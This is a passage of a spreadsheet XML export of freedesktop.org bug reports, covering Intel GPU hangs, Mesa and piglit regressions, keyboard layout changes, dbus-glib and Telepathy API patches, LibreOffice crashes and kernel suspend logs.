If change the kernel to 2.6.35-rc4 the issue doesn't come out.</t>
  </si>
  <si>
    <t>DRI-97130</t>
  </si>
  <si>
    <t>[APL] gem_tiled_swapping threaded oom killed high number of writeback pages/not freed/OOM killer should be excluded?</t>
  </si>
  <si>
    <t>Created attachment 125413
IVB-gem_tiled_swapping__threaded-output
Platform: IVB
CPU: Intel(R) Core(TM) i7-3770K CPU @ 3.50GHz (family 6 model 58 stepping 9)
Motherboard version: DH77EB
GPU: IntelÂ® HD Graphics 4000 - Xeon E3-1200 v2/3rd Gen Core processor Graphics Controller
Software
Bios: EBH7710H.86A.0096.2012.1012.1645
Linux distribution: Ubuntu 16.04 64 bits
Kernel: 4.7.0-rc7 7eeb04a from http://cgit.freedesktop.org/drm-intel/
  commit 7eeb04a101316645916d4d9df058a9341797f1af
  Author: Chris Wilson 
  Date:   Sun Jul 24 11:00:31 2016 +0100
  drm-intel-nightly: 2016y-07m-24d-09h-59m-54s UTC integration manifest
drm: libdrm-2.4.70 0caa84c from git://anongit.freedesktop.org/mesa/drm
mesa: mesa-11.2.2 3a9f628from git://anongit.freedesktop.org/mesa/mesa
cairo: 1.15.2 db8a7f1 from git://anongit.freedesktop.org/cairo
xserver: xorg-server-1.18.0-497 0b2f308 from git://git.freedesktop.org/git/xorg/xserver
xf86-video-intel: 2.99.917-687 6988b87 from git://git.freedesktop.org/git/xorg/driver/xf86-video-intel
libva: libva-1.7.0-26 c36971c from git://git.freedesktop.org/git/vaapi/libva
vaapi-intel-driver: 1.7.0-58 e554446 from git://git.freedesktop.org/git/vaapi/intel-driver
Intel-Gpu-Tools 1.15-140 e3abb20 from http://anongit.freedesktop.org/git/xorg/app/intel-gpu-tools.git
Steps:
------
1. Execute IGT tests:
# ./gem_tiled_swapping --r non-threaded
# ./gem_tiled_swapping --r threaded
Actual results
--------------
1. Process is most of the time killed by OOM killer when executed several times:
root@IVB102:/opt/X11R7/src/intel-gpu-tools/tests# ./gem_tiled_swapping --r non-threaded
IGT-Version: 1.15-ge3abb20 (x86_64) (Linux: 4.7.0-nightly+ x86_64)
Using 640 1MiB objects (available RAM: 244/31945 swap: 1888)
Subtest non-threaded: SUCCESS (74.847s)
root@IVB102:/opt/X11R7/src/intel-gpu-tools/tests# ./gem_tiled_swapping --r threaded
IGT-Version: 1.15-ge3abb20 (x86_64) (Linux: 4.7.0-nightly+ x86_64)
Using 640 1MiB objects (available RAM: 278/31945 swap: 1845)
Killed
Expected result
-----------------
1. Tests are Pass</t>
  </si>
  <si>
    <t>TELEPATHY-34091</t>
  </si>
  <si>
    <t>Allow TpSimplePasswordManager to be used with custom channels</t>
  </si>
  <si>
    <t>In bug #33485 I proposed an additional interface for SASLAuthentication channels that would allow the client to indicate to the CM whether the password should be cached in the CM.  If the channel implemented this additional interface it would no longer be possible to use TpSimplePasswordManager since the channel itself is completely hidden from the API user.  So I propose to modify the password manager API in a couple ways to allow the user to specify custom channels to be used with the password manager:
- expose the TpSimplePasswordChannel class as public API that can be used as a base class
- Add an alternative to tp_simple_password_manager_prompt_async() that takes a channel as a parameter.
Proposed changes have been implemented in the following branch: http://git.collabora.co.uk/?p=user/jonathon/telepathy-gliba=shortlogh=refs/heads/credentials-storage</t>
  </si>
  <si>
    <t>DRI-97869</t>
  </si>
  <si>
    <t>[drm] GPU HANG: ecode 9:0:0x85dfbfff in gnome-shell [10783] reason: Ring hung action: reset</t>
  </si>
  <si>
    <t>[   32.233465] [drm] stuck on render ring
[   32.233765] [drm] GPU HANG: ecode 9:0:0x85dfbfff in gnome-shell [10783] reason: Ring hung action: reset
[   32.233767] [drm] GPU hangs can indicate a bug anywhere in the entire gfx stack including userspace.
[   32.233768] [drm] Please file a _new_ bug report on bugs.freedesktop.org against DRI -&gt; DRM/Intel
[   32.233769] [drm] drm/i915 developers can then reassign to the right component if it's not a kernel issue.
[   32.233770] [drm] The gpu crash dump is required to analyze gpu hangs so please always attach it.
[   32.233770] [drm] GPU crash dump saved to /sys/class/drm/card0/error
[   32.235871] drm/i915: Resetting chip after gpu hang
[   34.234003] [drm] RC6 on
 448.405627] Modules linked in: fuse xt_CHECKSUM ipt_MASQUERADE nf_nat_masquerade_ipv4 tun ip6t_rpfilter ip6t_REJECT ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter bnep snd_hda_codec_hdmi arc4 intel_powerclamp coretemp snd_hda_codec_realtek intel_rapl iwlmvm kvm_intel snd_hda_codec_generic kvm mac80211 crc32_pclmul ghash_clmulni_intel ir_lirc_codec lirc_dev ir_mce_kbd_decoder ir_sanyo_decoder ir_sony_decoder snd_hda_intel iwlwifi snd_hda_codec snd_hda_core snd_hwdep ir_jvc_decoder snd_seq ir_rc6_decoder
[  448.405699]  snd_seq_device ir_rc5_decoder aesni_intel lrw gf128mul glue_helper snd_pcm ablk_helper cryptd cfg80211 ir_nec_decoder btusb sg bluetooth snd_timer pcspkr snd sdhci_pci rfkill sdhci shpchp soundcore i2c_i801 mmc_core rc_rc6_mce ite_cir rc_core acpi_pad nfsd auth_rpcgss nfs_acl lockd grace sunrpc ip_tables xfs libcrc32c sd_mod crc_t10dif crct10dif_generic i915 i2c_algo_bit drm_kms_helper crct10dif_pclmul crct10dif_common ahci libahci e1000e crc32c_intel ptp pps_core libata drm video i2c_hid i2c_core dm_mirror dm_region_hash dm_log dm_mod
[  448.405781] CPU: 1 PID: 0 Comm: swapper/1 Tainted: G        W      ------------   3.10.0-327.36.1.el7.x86_64 #1
[  448.405787] Hardware name:                  /NUC6i5SYB BIOS SYSKLi35.86A.0051.2016.0804.1114 08/04/2016
[  448.405792]  ffff88046ec83dd8 cbf661ff1e0a5065 ffff88046ec83d90 ffffffff81636301
[  448.405803]  ffff88046ec83dc8 ffffffff8107b260 ffff8804581ee000 ffff8804533a6000
[  448.405812]  ffff8804533a61a8 0000000000000001 ffff8804527a0000 ffff88046ec83e30
[  448.405821] Call Trace:
[  448.405824]    [] dump_stack+0x19/0x1b
[  448.405846]  [] warn_slowpath_common+0x70/0xb0
[  448.405853]  [] warn_slowpath_fmt+0x5c/0x80
[  448.405918]  [] ? __intel_pageflip_stall_check+0xc2/0x110 [i915]
[  448.405972]  [] intel_check_page_flip+0xd8/0xf0 [i915]
[  448.406020]  [] gen8_irq_handler+0x39e/0x4a0 [i915]
[  448.406028]  [] handle_irq_event_percpu+0x3e/0x1e0
[  448.406034]  [] handle_irq_event+0x3d/0x60
[  448.406041]  [] handle_edge_irq+0x77/0x130
[  448.406050]  [] handle_irq+0xbf/0x150
[  448.406058]  [] ? tick_check_idle+0x8a/0xd0
[  448.406066]  [] ? atomic_notifier_call_chain+0x1a/0x20
[  448.406073]  [] do_IRQ+0x4f/0xf0
[  448.406082]  [] common_interrupt+0x6d/0x6d
[  448.406085]    [] ? cpuidle_enter_state+0x52/0xc0
[  448.406098]  [] cpuidle_idle_call+0xd9/0x210
[  448.406107]  [] arch_cpu_idle+0xe/0x30
[  448.406114]  [] cpu_startup_entry+0x245/0x290
[  448.406122]  [] start_secondary+0x1ba/0x230
[  448.406127] ---[ end trace 4ad207009d862dc5 ]---
[  454.309934] [drm] stuck on render ring
[  454.310879] [drm] GPU HANG: ecode 9:0:0x87f99ff9 in gnome-shell [13221] reason: Ring hung action: reset
[  454.313234] drm/i915: Resetting chip after gpu hang
[  456.310579] [drm] RC6 on</t>
  </si>
  <si>
    <t>brian.chapman1</t>
  </si>
  <si>
    <t>LIBBSD-101545</t>
  </si>
  <si>
    <t>libbsd</t>
  </si>
  <si>
    <t>LIBBSD</t>
  </si>
  <si>
    <t>libbsd 0.8.4 move of man pages to section 3bsd incomplete?</t>
  </si>
  <si>
    <t>Hi!
I noticed that f20e6972b3a5ef4d1bfa2e3b2577caa3f9e357fc moved man pages from section 3 to section 3bsd (which is cool because there we collisions previously e.g. [1]).
I wonder if the installation directory should still be /usr/share/man/man3 (rather than /usr/share/man/man3bsd) but latter did not make my man find the man page out of the box any more (while former still does despite file ending .3bsd(.bz2)).  Also inside the man page the header still says section 3 e.g. HUMANIZE_NUMBER(3).  I would expect HUMANIZE_NUMBER(3bsd) here from a user point of view.  I'm curious about what can and should change and what should not.
Best
Sebastian
[1] https://bugs.gentoo.org/show_bug.cgi?id=617462</t>
  </si>
  <si>
    <t>guillem</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-55070</t>
  </si>
  <si>
    <t>Update Latvian modern layout to the latest stable version</t>
  </si>
  <si>
    <t>Some of special characters for Dead-key/Right-Alt + character are changed:
Note differences:
valdis@vostro:~/workspace.other/xkeyboard-config/symbols$ diff -up lv /xkb/symbols/lv.new 
--- lv	2012-09-18 22:41:49.142139292 +0300
+++ /xkb/symbols/lv.new	2012-09-18 22:37:26.830146168 +0300
@@ -13 +14 @@
+// $XKeyboardConfig$
 // Latvian keymap version 1.1
 // Copyright (C) Dmitry Golubev  2003-2004
 //
@@ -27910 +28010 @@ xkb_symbols modern {
 	key  {[ emacron		Emacron	emacron	Emacron			]}
 	key  {[ o		O		omacron	Omacron			]}
 	key  {[ amacron		Amacron	amacron	Amacron			]}
-	key  {[ p		P		p		P			]}
-	key  {[ b		B		b		B			]}
-	key  {[ j		J		j		J			]}
-	key  {[ d		D		d		D			]}
+	key  {[ p		P		question	P			]}
+	key  {[ b		B		exclam		B			]}
+	key  {[ j		J		emdash		J			]}
+	key  {[ d		D		endash		D			]}
 	key  {[ imacron		Imacron	imacron	Imacron			]}
 	key  {[ l		L		lcedilla	Lcedilla		]}
 	key  {[ g		G		gcedilla	Gcedilla		]}
@@ -30610 +30710 @@ xkb_symbols modern {
 	key  {[ x		X		q		Q			]}
 	key  {[ z		Z		zcaron		Zcaron			]}
 	key  {[ c		C		ccaron		Ccaron			]}
-	key  {[ v		V		period		V			]}
-	key  {[ w		W		slash		W			]}
-	key  {[ f		F		bar		F			]}
-	key  {[ y		Y		backslash	Y			]}
+	key  {[ v		V		bar		V			]}
+	key  {[ w		W		backslash	W			]}
+	key  {[ f		F		period		F			]}
+	key  {[ y		Y		slash		Y			]}
 	key  {[ h		H		U263A		U2639			]}
 	key  {[ comma		semicolon	less		multiply		]}
 	key  {[ period		colon		greater	division		]}</t>
  </si>
  <si>
    <t>valdis.vitolins</t>
  </si>
  <si>
    <t>MESA-74469</t>
  </si>
  <si>
    <t>[opencl] OpenCL fails on Kabini Radeon 8330</t>
  </si>
  <si>
    <t>The opencl-example if_* tests all fail
I'm not sure if this is related to bug 65085
I tried running bfgminer but the program segfaults once I did opencl:auto
I'll happily try piglet if you think it might be useful</t>
  </si>
  <si>
    <t>XORG-43144</t>
  </si>
  <si>
    <t>Render corruption of moved window</t>
  </si>
  <si>
    <t>Created attachment 53745
Screen corruption
Hello
as of git commit 3b9479dc39d32fd97f80c1e5e0fac67d36ee5e40 I got window content corruption if I move window from right to left :) (The opposite dirrection is not affected nor moving up/down).
See attached screenshot.</t>
  </si>
  <si>
    <t>DBUS-55729</t>
  </si>
  <si>
    <t>[PATCH] Add accessor to return the DBusGConnection from the DBusGMethodInvocation</t>
  </si>
  <si>
    <t>Created attachment 68212
Add accessor to return the DBusGConnection that a DBusGMethodInvocation was invoked on
For NetworkManager we're adding support for a private bus socket so that NM can be used in early-boot environments without a bus daemon running.  That means we're setting up a DBusServer object on a private socket and making dbus-glib aware of the connections that appear on that socket.
Since the authentication paths depend on which DBusGConnection the method invocation comes from as the private socket only accepts connections from root and since messages from the private socket don't have sender addresses we need to figure out which DBusGConnection the DBusGInvocation is associated with so we can short-circuit authentication checks and always allow any connections from the private socket.
Unfortunately we can't get at the DBusGConnection without doing something like:
DBusGConnection *gconn = (DBusGConnection *) context
which is a complete hack.  So I'd like to formalize this since it seems useful :)</t>
  </si>
  <si>
    <t>LIBREOFFICE-73545</t>
  </si>
  <si>
    <t>Shape with picture fill position is wrong</t>
  </si>
  <si>
    <t xml:space="preserve">Created attachment 91936
docx file
Shape with picture fill position imported wrong
XML Difference :
XML Difference :
Original :
502920
Roundtrip :
0
</t>
  </si>
  <si>
    <t>PIGLIT-96301</t>
  </si>
  <si>
    <t>piglit.spec.arb_separate_shader_objects.getprogrampipelineiv regression</t>
  </si>
  <si>
    <t>This test began failing with:
d8cf982 * i965: Expose GL 4.3 on Gen8+.
piglit/bin/arb_separate_shader_object-GetProgramPipelineiv -auto -fbo
piglit: debug: Requested an OpenGL 3.1 Forward-Compatible Core Context and received a matching 4.3 context
Unexpected GL error: GL_INVALID_OPERATION 0x502
(Error at ../tests/spec/arb_separate_shader_objects/GetProgramPipelineiv.c:273)
Attach program (10) to stage ((unrecognized enum)). Expected to be supported: yes
Attach program (8) to stage ((unrecognized enum)). Expected to be supported: yes
Unexpected GL error: GL_INVALID_OPERATION 0x502
(Error at ../tests/spec/arb_separate_shader_objects/GetProgramPipelineiv.c:86)
Attach program (6) to stage (GL_GEOMETRY_SHADER). Expected to be supported: yes
Attach program (4) to stage (GL_TESS_EVALUATION_SHADER). Expected to be supported: yes
Attach program (2) to stage (GL_TESS_CONTROL_SHADER). Expected to be supported: yes
Standard Error
Failed to link: 0:6(2): error: `gl_FragColor' undeclared
0:6(2): error: value of type vec4 cannot be assigned to variable of type error
Mesa: User error: GL_INVALID_OPERATION in glActiveShaderProgram(program 8 not linked)
Failed to get Active Program.
Mesa: User error: GL_INVALID_OPERATION in glUseProgramStages(program not linked)
Failed to get program of stage (unrecognized enum).</t>
  </si>
  <si>
    <t>DRI-84358</t>
  </si>
  <si>
    <t>[BDW Regression]igt/gem_render_copy_redux/flink-interruptible causes system hang</t>
  </si>
  <si>
    <t>==System Environment==
--------------------------
Regression: Yes.
Good commit on -next-queued: 648fb42d1e77cf90cddea2b1cf1f4ac4453e65e6
Non-working platforms: BSW
==kernel==
--------------------------
origin/drm-intel-nightly: 7101d84020f63f1da7e0c5d021cdd6be4d515de5(fails)
    drm-intel-nightly: 2014y-09m-25d-15h-14m-02s UTC integration manifest
origin/drm-intel-next-queued: 7ca5a41f4da201371e131fc0641033652f76bf30(fails)
    drm/i915: Avoid re-configure panel on every PSR re-enable.
origin/drm-intel-fixes: c84db77010877da6c5da119868ed54c43d59e726(fails)
    drm/i915/hdmi: fix hdmi audio state readout
==Bug detailed description==
-----------------------------
igt/gem_render_copy_redux/flink-interruptible causes system hang
unable to get dmesg because system hang.
==Reproduce steps==
---------------------------- 
1. ./gem_render_copy_redux --run-subtest flink-interruptible</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-91086</t>
  </si>
  <si>
    <t>libnice: add synthetic default assignee</t>
  </si>
  <si>
    <t>Is it possible to have a synthetic default assignee that more than one person can watch for libnice.
also does this bugzilla has admin roles for Products? If it does can you add me and Philip Withnall  ?</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-35299</t>
  </si>
  <si>
    <t>freedesktop.org hosting for PulseAudio</t>
  </si>
  <si>
    <t>Hello we would like to move the PulseAudio project from its current hosting to the freedesktop.org infrastructure.
Project name: PulseAudio
Services: Git Bugzilla mailing lists file upload space wiki
Who should be able to approve new members: lennart colin/coling (account pending: bug #35295)
Repositories:
pulseaudio - PulseAudio Sound Server
pavucontrol - PulseAudio Volume Control
Bugzilla:
  Product description: Bugs in the PulseAudio sound server modules and related tools
  Components:
    build-system: Issues related to the build system
    clients: Issues related to client-side interaction API etc.
    core: Issues with the core infrastructure
    daemon: Issues with the daemon
    alsa: Issues with PulseAudio-ALSA interaction
    modules: Issues in modules shipped with PulseAudio
    tools: Issues in tools and utilities shipped with PulseAudio
    pavucontrol: Issues in the PulseAudio Volume Control utility
    misc: Issues that don't fit any other category
  Default assignee: Can we have all bugs default-assigned to a list? (pulseaudio-bugs@lists.fd.o)
Lists: pulseaudio-discuss pulsaudio-commits pulseaudio-bugs (admins: lennart colin/coling)</t>
  </si>
  <si>
    <t>MESA-79534</t>
  </si>
  <si>
    <t>gen&lt;7 renders garbage</t>
  </si>
  <si>
    <t xml:space="preserve">commit 07af0abef024f8a17a00975265eff79aa069c9b5
Author: Matt Turner 
Date:   Tue May 27 10:25:05 2014 -0700
    i965/fs: Clean up fs_inst constructors.
    In a fashion suggested by Ken.
    Reviewed-by: Chris Forbes 
    Reviewed-by: Kenneth Graunke </t>
  </si>
  <si>
    <t>XORG-6549</t>
  </si>
  <si>
    <t>Several typo-induced undefined reference error in libxkbfile and libxkbui</t>
  </si>
  <si>
    <t>There are typos introduced by a recent revision on xorg/lib/xkbfile and
xorg/lib/xkbui that makes libxkbfile.so and libxkbui.so having undefined
reference error.
The problem is located in the following source codes:
xorg/lib/xkbfile/src/xkbout.c
xorg/lib/xkbfile/src/xkbtext.c
xorg/lib/xkbui/src/XKBui.c
and the corresponding revision log are:
http://webcvs.freedesktop.org/xorg/lib/xkbfile/src/xkbout.c?r1=1.7&amp;r2=1.8
http://webcvs.freedesktop.org/xorg/lib/xkbfile/src/xkbtext.c?r1=1.5&amp;r2=1.6
http://webcvs.freedesktop.org/xorg/lib/xkbui/src/XKBui.c?r1=1.4&amp;r2=1.5
The typos are:
XkbAtomGetString()   --&gt; XkbGetAtormString()
Xalloc() --&gt; xalloc()
Xfree() --&gt; xfree()
I made three dirty patches to fix these typos.</t>
  </si>
  <si>
    <t>sfyang</t>
  </si>
  <si>
    <t>XORG-20912</t>
  </si>
  <si>
    <t>set background none on composite overlay window</t>
  </si>
  <si>
    <t>Created attachment 24322
set bg to none on COW
Lots of distributions are working on a completely smooth boot from BIOS all the way through to the desktop.
One glitch is that when the compositing manager starts up and maps the composite overlay window the screen flashes to white.
It seems there's no way to avoid this because to get the window ID of the overlay window you have to XCompositeGetOverlayWindow() which maps it immediately. So there's no opportunity to change its background. The overlay window is on top of everything and unaffected by composite redirection so the white flash is visible.
Proposed solution is to default the COW to background None.
Attached patch which is untested shows how I think this might be implemented.</t>
  </si>
  <si>
    <t>LIBREOFFICE-43537</t>
  </si>
  <si>
    <t>Crash on save this file as DOC</t>
  </si>
  <si>
    <t>Created attachment 54125
Crash-O-Matic
If I save as DOC (word 97) immediate crash.
Also crashes during recovery.
Saving as ODT works so I've attached that.
Thanks !
Best Regards Dave
PS: Happened after I added top-right PNG picture.</t>
  </si>
  <si>
    <t>drn</t>
  </si>
  <si>
    <t>MESA-104711</t>
  </si>
  <si>
    <t>[skl CCS] Oxenfree (unity engine game) hangs GPU</t>
  </si>
  <si>
    <t>Created attachment 136863
gpu crash dump
Early on in the game (GOG ver. 2.6.0) you enter a cave.  A short moment later the GPU will hang and from thereon the hang is fully reproducible simply by restarting the game.  Changing options (resolution details windowed/fullscreen) does not make a difference.
Linux t460s 4.14.12-1-ARCH #1 SMP PREEMPT Fri Jan 5 18:19:34 UTC 2018 x86_64 GNU/Linux
Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz
X.Org X Server 1.19.6
Release Date: 2017-12-20
Extended renderer info (GLX_MESA_query_renderer):
    Vendor: Intel Open Source Technology Center (0x8086)
    Device: Mesa DRI Intel(R) HD Graphics 520 (Skylake GT2)  (0x1916)
    Version: 17.3.1
    Accelerated: yes
    Video memory: 3072MB
    Unified memory: yes
Attachment includes gzipped crash dump from /sys/class/drm/card0/error</t>
  </si>
  <si>
    <t>XQUARTZ-92652</t>
  </si>
  <si>
    <t>quartz-wm</t>
  </si>
  <si>
    <t>_XReadEvents is treating EAGAIN as a fatal error instead of just trying again</t>
  </si>
  <si>
    <t>I am trying to use XEvent.type = ClientMessage to detect when a user closes a window. The attached c code is a small program to test this. It runs properly under other X servers I've tried but with XQuartz I get the following error:
XIO: fatal IO error 35 (Resource temporarily unavailable) on X server /private/tmp/com.apple.launchd.OiaccbWRVW/org.macosforge.xquartz:0
    after 21 requests (16 known processed) with 0 events remaining.
This problem is not new with release 2.7.8 and was also present in release 2.7.7. Not sure if it was occurring in earlier releases.</t>
  </si>
  <si>
    <t>Art.vanderest</t>
  </si>
  <si>
    <t>DBUS-18913</t>
  </si>
  <si>
    <t>fix missing linking and add proper expat check</t>
  </si>
  <si>
    <t>Created attachment 20852
fix linking issue and add proper expat check
dbus-glib 0.78 doesn't compile due to missing linking to expat library:
./.libs/libdbus-gtool.a(dbus-gloader-expat.o): In function `description_load_from_string':
/home/users/builder/rpm/BUILD/dbus-glib-0.78/dbus/dbus-gloader-expat.c:204: undefined reference to `XML_ParserCreate_MM'
/home/users/builder/rpm/BUILD/dbus-glib-0.78/dbus/dbus-gloader-expat.c:211: undefined reference to `XML_SetUserData'
/home/users/builder/rpm/BUILD/dbus-glib-0.78/dbus/dbus-gloader-expat.c:212: undefined reference to `XML_SetElementHandler'
/home/users/builder/rpm/BUILD/dbus-glib-0.78/dbus/dbus-gloader-expat.c:215: undefined reference to `XML_SetCharacterDataHandler'
/home/users/builder/rpm/BUILD/dbus-glib-0.78/dbus/dbus-gloader-expat.c:218: undefined reference to `XML_Parse'
/home/users/builder/rpm/BUILD/dbus-glib-0.78/dbus/dbus-gloader-expat.c:261: undefined reference to `XML_ParserFree'
/home/users/builder/rpm/BUILD/dbus-glib-0.78/dbus/dbus-gloader-expat.c:247: undefined reference to `XML_ParserFree'
/home/users/builder/rpm/BUILD/dbus-glib-0.78/dbus/dbus-gloader-expat.c:225: undefined reference to `XML_GetErrorCode'
/home/users/builder/rpm/BUILD/dbus-glib-0.78/dbus/dbus-gloader-expat.c:229: undefined reference to `XML_ErrorString'
/home/users/builder/rpm/BUILD/dbus-glib-0.78/dbus/dbus-gloader-expat.c:229: undefined reference to `XML_GetCurrentColumnNumber'
/home/users/builder/rpm/BUILD/dbus-glib-0.78/dbus/dbus-gloader-expat.c:229: undefined reference to `XML_GetCurrentLineNumber'
collect2: ld returned 1 exit status
Attached patch fixes it and adds proper expat check / cleans up linking to expat library.
Have fun.</t>
  </si>
  <si>
    <t>LIBREOFFICE-86729</t>
  </si>
  <si>
    <t>Metadata is not imported from VSD files</t>
  </si>
  <si>
    <t>This is similar to 86664 but for binary VSD files created by Visio 2013. I'm attaching 3 files containing an ascii a latin1 and an utf8 title.</t>
  </si>
  <si>
    <t>PACKAGEKIT-19565</t>
  </si>
  <si>
    <t>Make gpk-application in GNOME close when pressing Control+Q</t>
  </si>
  <si>
    <t>Running gpk-application 0.3.12 in Fedora 10.
Control+Q and Control+W do not work.
Please fix or I'm going to hit you with a printed version of the HIG bible. :-P
Funny that Alt+F4 works but that's a key combination that I have never seen in GNOME for closing an app.</t>
  </si>
  <si>
    <t>TELEPATHY-26807</t>
  </si>
  <si>
    <t>Mute interface for Channel.Type.Call</t>
  </si>
  <si>
    <t>Calls need some kind of Mute interface.  An example is given in the rtcom spec (but for StreamedMedia):
http://git.collabora.co.uk/?p=rtcom-telepathy-glib.gita=blobf=rtcom-telepathy-glib/Channel_Interface_Mute.xmlh=d6b07a7c7c90f34eefb77b36e3aa2a3b89c831aehb=HEAD</t>
  </si>
  <si>
    <t>dilinger</t>
  </si>
  <si>
    <t>DRI-23836</t>
  </si>
  <si>
    <t>[KMS] sometimes freezes when resuming from suspend-to-disk</t>
  </si>
  <si>
    <t>Bug description:
  I reported my bug in the Debian BTS: http://bugs.debian.org/545517
I recopy its text at the end of this report.
I was asked by the Debian xorg maintainer to also report the bug here. However reading the bug writing guidelines I see that I will not be able to provide all requested information. I disabled KMS and I've no time any more to re-enable it (more exactly I have not enough time to be able to recover from data corruption if it happens again for now)
System environment:
-- chipset: Intel Corporation Mobile GM965/GL960
-- system architecture: 64-bit (x86_64)
-- xf86-video-intel: 2:2.8.1-1 [2.8.1 rom Xorg.0.log] (from xserver-xorg-video-intel Debian package)
-- xserver: 2:1.6.3-1 [1.6.3 from Xorg.0.log] (from xserver-xorg Debian package)
-- mesa: 7.5.1-1 (from mesa-utils Debian package)
-- libdrm: 2.4.13-1 (from libdrm2 Debian package)
-- kernel: 2.6.31-rc6-amd64 (from Debian Kernel Team experimental packages)
-- Linux distribution: Debian unstable
-- Machine or mobo model: Dell latitude D630
-- Display connector: LVDS and sometimes DVI
Copy from the Debian bug report:
  I've tried KMS since about 2.6.30. I've seen support improved for each new
kernel version (each new rc for 2.6.31) however suspend-to-disk has always
problems.
  With older kernel version KMS and suspend-to-disk did not work at all.
With more recent kernel (as 2.6.31-rc6) KMS and suspend-to-disk seems to
work sometimes. However it happens sometimes to freeze at restart (just
after reloading the kernel state ie after the ... reloading ... 100%).
The laptop is then completly frozen the graphical screen is not correctly
restored and I do not see anything in the /var/log/syslog after next reboot.
  When the laptop is so frozen the only solution is to hard-reboot it.
  After several such freeze some ext3 corruptions have been found on my disks
(both / and /home). I do not know if they are due to the bug itself or to the
fact that I had to hard-reboot the machine.
  Nevertheless I removed KMS in my configuration and now I can use
suspend-to-disk without any problems. Summer break being ended I need to be
able to suspend-to-disk and not to have on-disk corruption. So I do not know
when I will be able to test KMS again. If other users experiment the same
problem this bug can be use to track the progress on it.
  For info my graphic card is (from lspci):
00:02.0 VGA compatible controller: Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (rev 0c)
  Regards
    Vincent
PS: to enable KMS I only added
intel_agp
drm
i915 modeset=1
in /etc/initramfs-tools/modules and recreated the initrd
-- Package-specific info:
** Version:
Linux version 2.6.31-rc6-amd64 (Debian 2.6.31~rc6-1~experimental.1~snapshot.14160) (waldi@debian.org) (gcc version 4.3.3 (GCC) ) #1 SMP Sat Aug 22 01:15:15 UTC 2009
** Command line:
BOOT_IMAGE=/vmlinuz-2.6.31-rc6-amd64 root=/dev/mapper/eyak-root ro quiet
** Tainted: G W (512)
** Kernel log:
[236124.392058] CPU1 attaching sched-domain:
[236124.392061]  domain 0: span 0-1 level MC
[236124.392064]   groups: 1 0
[236124.392704] CPU1 is up
[236124.392708] ACPI: Waking up from system sleep state S4
[236124.404729] pci 0000:00:02.0: restoring config space at offset 0x1 (was 0x900007 writing 0x900403)
[236124.404851] ehci_hcd 0000:00:1a.7: PME# disabled
[236124.404889] HDA Intel 0000:00:1b.0: restoring config space at offset 0x1 (was 0x100106 writing 0x100102)
[236124.405222] ehci_hcd 0000:00:1d.7: PME# disabled
[236124.405244] pci 0000:00:1e.0: restoring config space at offset 0x6 (was 0x20040300 writing 0x20070300)
[236124.405367] ahci 0000:00:1f.2: restoring config space at offset 0x1 (was 0x2b00403 writing 0x2b00407)
[236124.405516] iwlagn 0000:0c:00.0: restoring config space at offset 0x1 (was 0x100106 writing 0x100506)
[236124.405620] tg3 0000:09:00.0: restoring config space at offset 0xc (was 0x0 writing 0x20200000)
[236124.405685] yenta_cardbus 0000:03:01.0: restoring config space at offset 0xf (was 0x14001ff writing 0x5c001ff)
[236124.405698] yenta_cardbus 0000:03:01.0: restoring config space at offset 0xa (was 0x0 writing 0xf43ff000)
[236124.405704] yenta_cardbus 0000:03:01.0: restoring config space at offset 0x9 (was 0x0 writing 0xf4000000)
[236124.405718] yenta_cardbus 0000:03:01.0: restoring config space at offset 0x3 (was 0x824000 writing 0x82a800)
[236124.405725] yenta_cardbus 0000:03:01.0: restoring config space at offset 0x1 (was 0x4100007 writing 0x4100087)
[236124.405769] firewire_ohci 0000:03:01.4: restoring config space at offset 0x1 (was 0x2100117 writing 0x2180117)
[236124.446617] pci 0000:00:02.0: PME# disabled
[236124.446624] pci 0000:00:02.0: setting latency timer to 64
[236124.446628] pci 0000:00:02.1: PME# disabled
[236124.446634] uhci_hcd 0000:00:1a.0: setting latency timer to 64
[236124.446674] usb usb2: root hub lost power or was reset
[236124.446713] uhci_hcd 0000:00:1a.1: setting latency timer to 64
[236124.446752] usb usb4: root hub lost power or was reset
[236124.446772] ehci_hcd 0000:00:1a.7: PME# disabled
[236124.446776] ehci_hcd 0000:00:1a.7: setting latency timer to 64
[236124.446781] usb usb1: root hub lost power or was reset
[236124.450667] ehci_hcd 0000:00:1a.7: debug port 1
[236124.450673] ehci_hcd 0000:00:1a.7: cache line size of 32 is not supported
[236124.450730] HDA Intel 0000:00:1b.0: PCI INT A -&gt; GSI 21 (level low) -&gt; IRQ 21
[236124.450736] HDA Intel 0000:00:1b.0: setting latency timer to 64
[236124.592360] uhci_hcd 0000:00:1d.0: setting latency timer to 64
[236124.592404] usb usb5: root hub lost power or was reset
[236124.592423] uhci_hcd 0000:00:1d.1: setting latency timer to 64
[236124.592460] usb usb6: root hub lost power or was reset
[236124.592477] uhci_hcd 0000:00:1d.2: setting latency timer to 64
[236124.592515] usb usb7: root hub lost power or was reset
[236124.592552] ehci_hcd 0000:00:1d.7: PME# disabled
[236124.592556] ehci_hcd 0000:00:1d.7: setting latency timer to 64
[236124.592561] usb usb3: root hub lost power or was reset
[236124.596452] ehci_hcd 0000:00:1d.7: debug port 1
[236124.596457] ehci_hcd 0000:00:1d.7: cache line size of 32 is not supported
[236124.596468] pci 0000:00:1e.0: setting latency timer to 64
[236124.596475] PIIX_IDE 0000:00:1f.1: PCI INT A -&gt; GSI 16 (level low) -&gt; IRQ 16
[236124.596505] PIIX_IDE 0000:00:1f.1: setting latency timer to 64
[236124.596577] ahci 0000:00:1f.2: setting latency timer to 64
[236124.596807] tg3 0000:09:00.0: restoring config space at offset 0xc (was 0x0 writing 0x20200000)
[236124.596919] yenta_cardbus 0000:03:01.0: O2: res at 0x94/0xD4: 00/ea
[236124.596920] yenta_cardbus 0000:03:01.0: O2: enabling read prefetch/write burst
[236124.736259] firewire_ohci 0000:03:01.4: restoring config space at offset 0x1 (was 0x2100117 writing 0x2180117)
[236124.808262] firewire_core: skipped bus generations destroying all nodes
[236124.827171] serial 00:09: activated
